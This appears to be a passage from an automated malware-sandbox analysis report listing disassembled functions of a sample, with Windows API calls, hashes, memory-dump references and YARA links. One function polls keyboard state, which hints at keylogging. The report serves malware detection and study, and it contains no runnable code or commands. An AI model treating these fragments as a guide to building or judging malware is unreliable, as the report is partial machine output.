                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d8caab77ad3cd9337af31e3ca2c8636e967f00d4436f0ae779fda88a80bdb38
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8C10171604305AF8B00DF68C884D6BBBE9FF89748F10495DF98A9B261DB31ED46CB52
                                                                                                                                                                                                                                                                                                    Function 00A884DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A88538
                                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A885D4
                                                                                                                                                                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00A885E8
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00AB0CD4,00000000,00000001,00AD7E8C,?), ref: 00A88634
                                                                                                                                                                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A886B9
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00A88711
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00A8879C
                                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A887BF
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00A887C6
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00A8881B
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A88821
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fe3d553cd62a2ed69bbb31288dede484aad7fd467cb998fca46555be5a1f7762
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3f27ea1d9c90e30ba1a8374019b2bf184b33059323a6253a3f0542b8eb6e21bc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe3d553cd62a2ed69bbb31288dede484aad7fd467cb998fca46555be5a1f7762
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62C12B75A00109AFCB14DFA4C984DAEBBF5FF48344B5484A9E41ADB261DB34ED41CB90
                                                                                                                                                                                                                                                                                                    Function 00A70378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A7039F
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00A703F8
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A7040A
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A7042A
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00A7047D
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A70491
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A704A6
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00A704B3
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A704BC
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A704CE
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A704D9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5ca35fce2e4a3d3cee9ba27b0f210bf9116e07c821665500e468f8820602f0ee
                                                                                                                                                                                                                                                                                                    • Instruction ID: 02601dc015dec3f0eb3349403249315122ed608cea3b99285869ef34889c8905
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ca35fce2e4a3d3cee9ba27b0f210bf9116e07c821665500e468f8820602f0ee
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E412175A00219DFCB10DFA4DC44DEEBBB9FF48354F00C469E95AA7261C774A946CB90
                                                                                                                                                                                                                                                                                                    Function 00A7A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7A65D
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00A7A6DE
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00A7A6F9
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00A7A713
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00A7A728
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00A7A740
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00A7A752
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00A7A76A
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00A7A77C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00A7A794
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00A7A7A6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9c4cc38a8f662fc8d30da032a073aa52078e31c9c567517dae13a194349867fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1017574e6425700298b42ffdca512bfd0e49be6c8435a8f05cf5f090c03387f0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c4cc38a8f662fc8d30da032a073aa52078e31c9c567517dae13a194349867fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA4196646047CA7DFF3997608C443ADBEB06BB5344F08C059D5CA9A5C2EBA499C4C753
                                                                                                                                                                                                                                                                                                    Function 00A99730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                    • Opcode ID: e07045e6c8ce8a97a33a136b9a4731b6cc67212e92029bf6c2c1057138cdb29f
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd38142c3df57c7f63a9ca4ad08b799adf8fe0944f5dfa2f3dac7a842f43f955
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07045e6c8ce8a97a33a136b9a4731b6cc67212e92029bf6c2c1057138cdb29f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE519F31B00516ABCF14DFACC9519BEB7E5BF65360B20822DE866E7294EB31DE41C790
                                                                                                                                                                                                                                                                                                    Function 00A94189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32 ref: 00A941D1
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A941DC
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00AB0B44,?), ref: 00A94236
                                                                                                                                                                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00A942A9
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A94341
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A94393
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                    • Opcode ID: 16f5b4f5d6dc70c91f05a03c6db07293cb2ae3559c91d66b0eec195b99434d0d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7cc760122cc540e3e3c002abf57cb0733c535e9586d464131343916d3a8f54ac
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16f5b4f5d6dc70c91f05a03c6db07293cb2ae3559c91d66b0eec195b99434d0d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B061AD70708301AFCB10DF64C989FAABBE4BF49714F000919F4869B291DB70ED46CB92
                                                                                                                                                                                                                                                                                                    Function 00A88BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00A88C9C
                                                                                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A88CAC
                                                                                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A88CB8
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A88D55
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88D69
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88D9B
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A88DD1
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88DDA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9299be9e6e08f41a2ea6ecbfafe75a25160e04e7cf7723a57d62d92e06df5aa3
                                                                                                                                                                                                                                                                                                    • Instruction ID: eb3673fde31c1650b173ba77a3628d650915676a646b86adca0b21c660931ac0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9299be9e6e08f41a2ea6ecbfafe75a25160e04e7cf7723a57d62d92e06df5aa3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A96148B2504305AFCB10EF60C9459DEB3E8FF99310F44892EF99987291DB39E945CB92
                                                                                                                                                                                                                                                                                                    Function 00AA46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateMenu.USER32 ref: 00AA4715
                                                                                                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00AA4724
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA47AC
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00AA47C0
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00AA47CA
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA47F7
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00AA47FF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$F
                                                                                                                                                                                                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                    • Opcode ID: e63f735d5d6fb3dc8f8624cbf035041227e3178b4bf9f04fa8d58cddd1fa0e78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f5b2c697a94535dbdac5c4ecd35e859e73b69f8cbcb21a5a0faa36c73dc67ea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63f735d5d6fb3dc8f8624cbf035041227e3178b4bf9f04fa8d58cddd1fa0e78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5417A75A0124AEFDB14DFA4E884EAA7BB5FF8E314F144028FA4697390D7B4A911CB50
                                                                                                                                                                                                                                                                                                    Function 00A7282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00A728B1
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00A728BC
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00A728D8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A728DB
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00A728E4
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00A728F8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A728FB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: aabc559651867eb3b0a3769af9436962f245e8f60c76e7c8a34325d249896a29
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0bc1d7b5e2a3373e972c45365250ca2211068c5b48eb4eb9b9be183fd05051c1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aabc559651867eb3b0a3769af9436962f245e8f60c76e7c8a34325d249896a29
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D21B075900118BBCF14EFA0CC85EEEBBB8EF0A350F008156B9A6A72D1DB354859DB60
                                                                                                                                                                                                                                                                                                    Function 00A7290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00A72990
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00A7299B
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00A729B7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A729BA
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00A729C3
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00A729D7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A729DA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6249c302f6e9ad3a70144068a8d9d76cc63a1698ad9badf7f567e229e9f76277
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9bfabf87bc68bca80015fd0928b9e91cbefbd2f5d0be29a4abfec9e04c199419
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6249c302f6e9ad3a70144068a8d9d76cc63a1698ad9badf7f567e229e9f76277
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8721C375D00118BBCF15EFA0DC85EFEBBB8EF05340F048056B9A6A7291DB754859DB60
                                                                                                                                                                                                                                                                                                    Function 00AA44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AA4539
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AA453C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA4563
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AA4586
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AA45FE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AA4648
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AA4663
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AA467E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AA4692
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AA46AF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
